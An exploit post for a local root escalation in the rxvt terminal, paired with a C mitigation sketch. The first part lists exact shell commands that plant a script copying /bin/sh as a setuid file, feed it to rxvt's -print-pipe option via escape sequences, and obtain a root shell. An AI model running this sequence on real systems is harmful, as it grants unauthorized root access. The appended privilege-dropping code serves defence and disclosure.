Exploit:
1. Set the DISPLAY environment variable so you can use X clients.
2. In user shell:
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
$ chmod +x /tmp/rxbug
$ rxvt -print-pipe /tmp/rxbug
3. In the rxvt X client:
$ cat
ESC[5i
ESC[4i
(The client will close at this point with a broken pipe)
4. $ /tmp/rxsh
# whoami
root
#
Author: Dave M. (davem@cmu.edu)
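
A mitigation sketch for the bug exercised above, added here and not taken from rxvt or from the original post. Step 4 yields a root shell, which implies the print-pipe command ran with root's effective uid, so the example assumes a setuid-root terminal and drops privileges in the child before running the command. The names drop_privileges and run_print_pipe are hypothetical.

```c
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently give up setuid/setgid privilege; 0 only if the drop is verified. */
static int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0 || setuid(ruid) != 0)  /* group first, while still privileged */
        return -1;
    if (ruid != 0 && setuid(0) == 0)             /* root must not be recoverable */
        return -1;
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

/* Hypothetical helper: feed `data` to the user's print command, return its exit status. */
int run_print_pipe(const char *cmd, const char *data)
{
    int fd[2], status;
    if (pipe(fd) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fd[0]); close(fd[1]); return -1; }
    if (pid == 0) {                              /* child: becomes the print command */
        close(fd[1]);
        if (drop_privileges() != 0 || dup2(fd[0], STDIN_FILENO) < 0)
            _exit(126);                          /* refuse to run rather than run as root */
        close(fd[0]);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    close(fd[0]);
    signal(SIGPIPE, SIG_IGN);  /* a command that never reads stdin must not kill the terminal */
    if (write(fd[1], data, strlen(data)) < 0) { /* EPIPE: command exited without reading */ }
    close(fd[1]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample data; the command simply discards it. */
    printf("exit status: %d\n", run_print_pipe("cat >/dev/null", "constructed page\n"));
    return 0;
}
```

With the drop in place, a command like the one in step 2 runs with the invoking user's own uid and gid, so the copied shell gains nothing from the terminal's setuid bit.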